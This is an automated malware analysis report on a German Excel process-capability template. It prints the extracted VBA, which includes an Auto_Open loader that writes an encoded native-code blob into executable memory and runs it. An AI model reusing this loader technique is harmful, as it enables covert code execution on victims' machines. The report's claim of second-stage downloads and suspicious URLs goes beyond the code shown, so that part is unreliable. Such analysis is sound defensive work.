Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c583106910a74973…

MALICIOUS

Office (OOXML)

163.9 KB Created: 2013-06-04 12:27:04 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-09-24
MD5: ee5cfd02dfe7a5d55d8cab0194368a2c SHA-1: d2a497871d233c5b7578aba7c8bb0d8f988a1ac0 SHA-256: c583106910a7497354c02ed6c3753bab739a1930df86d5bf0a4c40e5068d9f64
154 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an OOXML document containing VBA macros, specifically triggering Workbook_Open and Auto_Open events. The presence of CreateObject calls and the obfuscated script attempting to use VirtualAlloc suggests the macro is designed to execute arbitrary code, likely downloading a second-stage payload. The embedded URLs are suspicious and may be related to the payload delivery or C2 infrastructure.

Heuristics 9

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: xl/printerSettings.bin)
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim drv     As Object
        Set fsObj = CreateObject("Scripting.FileSystemObject")
        Set drv = fsObj.Drives("C")
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
     ThisWorkbook.Sheets("Berechnung").Visible = xlSheetVeryHidden
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Public Sub Auto_Open()
  • External relationship medium OOXML_EXTERNAL_REL
    External target in xl/externalLinks/_rels/externalLink1.xml.rels: /Users/Admin/Google Drive/sixsigmablackbelt/Freie Dateien/Prozessfaehigkeit-Maschinenfaehigkeit-Vorlage-Excel-kurz-20190
  • External hyperlinks (2) low OOXML_EXTERNAL_HYPERLINKS
    Document contains 2 external hyperlinks — clickable URLs are stored as external relationships. First target: https://www.sixsigmablackbelt.de/
  • Hidden worksheet (veryHidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 2 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.sixsigmablackbelt.de Document hyperlink
    • https://www.sixsigmablackbelt.de/Document hyperlink
    • https://order.shareit.com/product?vendorid=200286567&productid=300977794OOXML external relationship

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 15533 bytes
SHA-256: d65a95d9c800f1a3a5b892e959c8f3621bbe52a3f76beaebe0f847077d94f96b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit


Attribute VB_Name = "mAPI"
Option Explicit

'--------------------------------------------------------------
' This VBA Project has been protected with a proprietary scheme
' Do NOT tamper with this file, as Excel may crash!
'--------------------------------------------------------------

Private Const OPTION_BASE                  As Long = 0
Private Const OPTION_FLAGS                 As Long = 2
Private Const OPTION_INCLUDE_REFERENCEDOCS As Long = 0
Private Const OPTION_DISABLEDCLASSES       As String = ""
Private Const PAGE_EXECUTE_RW              As Long = &H40
Private Const MEM_RESERVE_AND_COMMIT       As Long = &H3000
Private Const MEM_RELEASE                  As Long = &H8000
Private Const ERR_OUT_OF_MEMORY            As Long = &H7
Private Const ROOTOBJECT_SIZE              As Long = &H4D948

Private m_Loader As VCOMInitializerStruct
Private m_VCOMObject As Object

#If VBA7 = False Then
    Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Address As Long, ByVal Size As Long, ByVal AllocationType As Long, ByVal Protect As Long) As Long
    Private Declare Function GetModuleHandleA Lib "kernel32" (ByVal ProcName As String) As Long
    Private Declare Function GetProcAddress Lib "kernel32" (ByVal Module As Long, ByVal ProcName As String) As Long
    Private Declare Function VirtualFree Lib "kernel32" (ByVal lpAddress As Long, ByVal Size As Long, ByVal dwFreeType As Long) As Long
    Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef Dest As Any, ByRef Source As Any, ByVal Size As Long)
    Private Const VBA_VERSION              As Long = 6

    Private Type VCOMInitializerStruct
        vtbl_QueryInterface As Long
        vtbl_AddRef As Long
        vtbl_Release As Long
        vtbl_GetTypeInfoCount As Long
        vtbl_GetTypeInfo As Long
        vtbl_GetIDsOfNames As Long
        vtbl_Invoke As Long
        RootObjectMem As Long
        HelperObject As Object
        SysFreeString As Long
        GetProcAddress As Long
        NativeCode As String
        LoaderMem As Long
        IgnoreFlag As Boolean
        VTablePtr As Long
        Kernel32Handle As Long
        RootObject As Object
        ClassFactory As Object
    End Type
#Else
    Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Address As LongPtr, ByVal Size As LongPtr, ByVal AllocationType As Long, ByVal Protect As Long) As LongPtr
    Private Declare PtrSafe Function GetModuleHandleA Lib "kernel32" (ByVal ProcName As String) As LongPtr
    Private Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal Module As LongPtr, ByVal ProcName As String) As LongPtr
    Private Declare PtrSafe Function VirtualFree Lib "kernel32" (ByVal lpAddress As LongPtr, ByVal Size As LongPtr, ByVal dwFreeType As Long) As Long
    Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef Dest As Any, ByRef Source As Any, ByVal Size As LongPtr)
    Private Const VBA_VERSION              As Long = 7

    Private Type VCOMInitializerStruct
        vtbl_QueryInterface As LongPtr
        vtbl_AddRef As LongPtr
        vtbl_Release As LongPtr
        vtbl_GetTypeInfoCount As LongPtr
        vtbl_GetTypeInfo As LongPtr
        vtbl_GetIDsOfNames As LongPtr
        vtbl_Invoke As LongPtr
        RootObjectMem As LongPtr
        HelperObject As Object
        SysFreeString As LongPtr
        GetProcAddress As LongPtr
        NativeCode As String
        LoaderMem As LongPtr
        IgnoreFlag As Boolean
        VTablePtr As LongPtr
        Kernel32Handle As LongPtr
        RootObject As Object
        ClassFactory As Object
    End Type
#End If

Public Sub Auto_Open()

    With m_Loader
        .NativeCode = "%EEEE%::::PPPPPPPPPH+D$ XXXtNXXXXXXVSPPPPj PPPPPPPP4T)D$04P)D$,4'4 )D$($ PZ3D$@+D$ YQ3H +L$ XP3Q +T$0XPf55ntvf)B|+T$0+T$0+T$0R[YQ^VXP2CP<0tF1D$$kD$$@!L$$2CQ1D$$kD$$@!L$$2CR1D$$kD$$@!L$$2CS+\$,3BP1BP1rP3rP+T$(  XXXXXXXXXXXXX[^tJAYAZQ4tPPPPH)D$@4pH)D$84'4 H)D$0$ PH+L$ H3AtH+D$ L3PtL+T$HXPf55{L+T$HL+T$HtqfA)B8ARA[YQXPA2CD<0tR1D$0kD$0@L!L$0A2CE1D$0kD$0@L!L$0A2CF1D$0kD$0@L!L$0A2CGL+\$@A3BDA1BDA1JDA3JDL+T$8  XXXXXYXXXXqBLHOJA@n[??n[=ezoieZZprkhs^ljbZljbZ=bNZ_Q_>HirF[Q^Z[IrzRM wGDDoeTtKTfdGVduCVduCGhiCGhygGhygCmzXGcH[D_J^DV VfF VX<TI@<_veu]flqomliCuelQxpdudatE@hrwIkzSMzvOizw_Mzw_MssLJssLZBCLZ@A]^@A]^TNa^oFmn^nIv@aSsbT?WeWnSg_DCgKjKWCgHe[wJGe;?@fj;Ifyr@cfMAmTN_rNKNzxilIhMnADMgDV@cm;<jihu?aE=]rdY\puMUpgDuAa;UqSWBSPSUG=LUFNNESSOPGVYEbGXQWROj__GHKjOj_MIHKj^x?IRh=XVh=XVKH<VYKlJWLbAEtOIg@nIDT^HJVOD[KGudwGDEeFT[reTWJ@\ht>a;r>cruLna<Mniy?eKL_]zy?\pznXpznXANNXIL_\IL_\xSc\iMIUzQIdEoomgyo=XAyzJCDBXN>=QKmvHmtvO]HXO]J\O]J\m]hV?]mXmQvgl=tdpaS RUqPBV \PRocNMQflywB>;gFluaO?jKF@UIO ai_vUJ[apwFqeFGfACZVu>[0"

        .LoaderMem = VirtualAlloc(0, Len(.NativeCode), MEM_RESERVE_AND_COMMIT, PAGE_EXECUTE_RW)
        If .LoaderMem = 0 Then Err.Raise ERR_OUT_OF_MEMORY

        .RootObjectMem = VirtualAlloc(0, ROOTOBJECT_SIZE, MEM_RESERVE_AND_COMMIT, PAGE_EXECUTE_RW)
        If .RootObjectMem = 0 Then Err.Raise ERR_OUT_OF_MEMORY

        .vtbl_QueryInterface = .LoaderMem
        .VTablePtr = VarPtr(m_Loader)
        .Kernel32Handle = GetModuleHandleA("KERNEL32")
        .GetProcAddress = GetProcAddress(.Kernel32Handle, "GetProcAddress")
        .SysFreeString = GetProcAddress(GetModuleHandleA("OLEAUT32"), "SysFreeString")
        Call CopyMemory(ByVal .LoaderMem, ByVal .NativeCode, Len(.NativeCode))
        Call CopyMemory(.RootObject, VarPtr(.VTablePtr), LenB(.VTablePtr))
        .IgnoreFlag = TypeOf .RootObject Is VBA.Collection
        Set .ClassFactory = (.RootObject)
        Set .RootObject = Nothing
        VirtualFree .LoaderMem, 0, MEM_RELEASE
        Call .ClassFactory.Init(.Kernel32Handle, .GetProcAddress, OPTION_BASE + OPTION_FLAGS, VBA_VERSION, .HelperObject)
        Set m_VCOMObject = .ClassFactory.GetErrEx()
    End With

End Sub


Attribute VB_Name = "DieseArbeitsmappe"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'###################################################
'Vorgehensweise
'Oeffne Modul: Module Funktion_und_Lizenz
'Trage Firmenname ein -> strLizenzfuer = "Roland"
'speichere File und schließe
'öffne File
'Fuehre sub: Lizenz_setzen_in_Berechnungsblatt() aus
'Fuehre sub: speichern_mit_Lizenz aus
'###################################################




'Fuehre sub: Lizenz_setzen_in_Berechnungsblatt() aus
'Fuehre sub: speichern_mit_Lizenz aus
'###################################################

''''''''''''''''''''''''''''''''''''''''''''''''''''''''

'         Blattschutz Eingabe "4twpq30qcb"

''''''''''''''''''''''''''''''''''''''''''''''''''''''''


Private Sub Workbook_Open()
 ThisWorkbook.Sheets("Berechnung").Visible = xlSheetVeryHidden
 
 Call Lizenz
 With ActiveSheet.PageSetup
                .RightFooter = "&""Arial""&12" & "    licensed to " & strLizenzfuer & " © by www.sixsigmablackbelt.de    "
                '.CenterHeader = "&""Arial""&60&KE6E6E6" & Chr(10) & Chr(10) & Chr(10) & "w w w . s i x s i g m a b l a c k b e l t . d e"
 End With
 
 
  hdnum_anzeigen
 
 Hinweis.Show
 
End Sub


Private Sub Lizenzierung()

Call Workbook_Open
Call Lizenz_setzen_in_Berechnungsblatt
Call speichern_mit_Lizenz
ThisWorkbook.Close SaveChanges:=False

End Sub
Private Sub Lizenz_setzen_in_Berechnungsblatt()

ThisWorkbook.Sheets("Berechnung").Cells(1, 1).Value = strLizenzfuer

End Sub

Private Sub speichern_mit_Lizenz()
Dim Datei As String
ChDir "C:\Users\Admin\Google Drive\sixsigmablackbelt\Kundendateien"
Datei = "process_capability_template__v1_" & strLizenzfuer & Format(Date, "_yyyy_mm_dd") & ".xlsm"
ActiveWorkbook.SaveAs Filename:= _
Datei, FileFormat:=xlOpenXMLWorkbookMacroEnabled, CreateBackup:=False

ChDir "C:\Users\Admin\Google Drive\sixsigmablackbelt\Kundendateien"
Datei = "process_capability_template_v1_" & strLizenzfuer & Format(Date, "_yyyy_mm_dd_org") & ".xlsm"
ActiveWorkbook.SaveAs Filename:= _
Datei, FileFormat:=xlOpenXMLWorkbookMacroEnabled, CreateBackup:=False

End Sub




Public Sub Workbook_BeforeClose(Cancel As Boolean)

 ThisWorkbook.Sheets("Berechnung").Visible = xlSheetVeryHidden



End Sub
Private Sub Workbook_BeforePrint(Cancel As Boolean)
    With ActiveSheet.PageSetup
                .RightFooter = "&""Arial""&12" & "    licensed to " & strLizenzfuer & " © by www.sixsigmablackbelt.de    "
                '.CenterHeader = "&""Arial""&60" & KE6E6E6 & Chr(10) & "w w w . s i x s i g m a b l a c k b e l t . d e"
 End With

End Sub
Public Sub Berechnung_anzeigen()

 ThisWorkbook.Sheets("Berechnung").Visible = xlSheetVisible

End Sub
Public Sub translation_anzeigen()

 ThisWorkbook.Sheets("translation").Visible = xlSheetVisible

End Sub

Private Sub namen_verbergen()

For Each n In ActiveWorkbook.Names
n.Visible = False
Next n

End Sub

Private Sub namen_anzeigen()

For Each n In ActiveWorkbook.Names
n.Visible = True
Next n

End Sub




Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Tabelle2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Funktionen_und_Lizenz"
Public strLizenzfuer As String

Sub Lizenz()
strLizenzfuer = "invalid license"
End Sub

Sub hdnum_anzeigen()
Dim FestplatteID As String
FestplatteID = HDNUM()
Hinweis.textbox_FestplattenID.Value = "Hard Disk ID: " & FestplatteID

End Sub

Public Function HDNUM() As String
    Dim fsObj   As Object
    Dim drv     As Object
    Set fsObj = CreateObject("Scripting.FileSystemObject")
    Set drv = fsObj.Drives("C")
    HDNUM = Hex(drv.serialnumber)
End Function


Attribute VB_Name = "Funktionen"
'six_a
'six_m
'six_st
'six_cmu
'six_cmo
'six_cm
'six_ck
'six_md

Public Function six_m(xi As Range) As Double
 six_m = WorksheetFunction.Average(xi)
End Function

Public Function six_st(xi As Range) As Double
 six_st = WorksheetFunction.StDev(xi)
End Function

Public Function six_a(xi As Range) As Double
 six_a = WorksheetFunction.Count(xi)
End Function

Public Function six_cmu(Mittelwert As Double, UGW As Double, Standardabweichung As Double) As Double
    six_cmu = ((Mittelwert - UGW) / (3 * Standardabweichung))
End Function

Public Function six_cmo(OGW As Double, Mittelwert As Double, Standardabweichung As Double) As Double
    six_cmo = ((OGW - Mittelwert) / (3 * Standardabweichung))
End Function
Public Function six_cm(OGW As Double, UGW As Double, Standardabweichung As Double) As Double
    six_cm = ((OGW - UGW) / (6 * Standardabweichung))
End Function
Public Function six_ck(cmo As Double, cmu As Double) As Double
    six_ck = WorksheetFunction.Min(cmo, cmu)
End Function
Public Function six_md(cmo As Double, cmu As Double) As Double
    six_md = WorksheetFunction.Min(cmo, cmu)
End Function


Attribute VB_Name = "Bereinigen"
Sub Bereinigen()


Worksheets("Berechnung").Range("b1:l4").ClearContents
Worksheets("Berechnung").Range("b1:b204").ClearContents
Worksheets("Berechnung").Range("e1:e204").ClearContents
Worksheets("Berechnung").Range("h1:h204").ClearContents
Worksheets("Berechnung").Range("k1:k204").ClearContents

Worksheets("Berechnung").Range("o5:p35").ClearContents
Worksheets("Berechnung").Range("p58:y63").ClearContents
Worksheets("Berechnung").Range("bl4:bl20").ClearContents
Worksheets("Berechnung").Range("ad3:bp4").ClearContents

End Sub

Sub Rahmen()
'
' Makro2 Makro
'

'
    Cells.Select
    Selection.Borders(xlDiagonalDown).LineStyle = xlNone
    Selection.Borders(xlDiagonalUp).LineStyle = xlNone
    With Selection.Borders(xlEdgeLeft)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    With Selection.Borders(xlEdgeTop)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    With Selection.Borders(xlEdgeBottom)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    With Selection.Borders(xlEdgeRight)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    With Selection.Borders(xlInsideVertical)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    With Selection.Borders(xlInsideHorizontal)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
End Sub


Attribute VB_Name = "Hinweis"
Attribute VB_Base = "0{2DD6D6E0-E769-4624-BAB5-E1D5AEF9D4D7}{A8479FF1-66B3-44C3-876C-579C574CB0DE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub button_website_oeffnen_Click()

strWebsite = "https://order.shareit.com/product?vendorid=200286567&productid=300977794"
   ActiveWorkbook.FollowHyperlink Address:=strWebsite, NewWindow:=True

End Sub

Private Sub Formularschliessen_Click()

Unload Me
End Sub





'Private Sub UserForm_QueryClose(Cancel As Integer, CloseMode As Integer)
'If CloseMode = vbFormControlMenu Then
'        MsgBox "Dieser Hinweis schließt automatisch 30 Sekunden nach Erscheinen"
'        Cancel = True
'End If
'End Sub

Private Sub TextBox2_Change()

End Sub

Attribute VB_Name = "Tabelle4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Tabelle5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 7680 bytes
SHA-256: 6a16c87b775311033081d02b1fce6a5433ac17f9dfba9aea51a8a8a21b54f861
vbaProject_01.bin vba-project OOXML VBA project: xl/printerSettings.bin 60928 bytes
SHA-256: f3a3bc207d67cbd78c2df8dd2da798baac02b5194642ae1e58cbcb137fe98ba6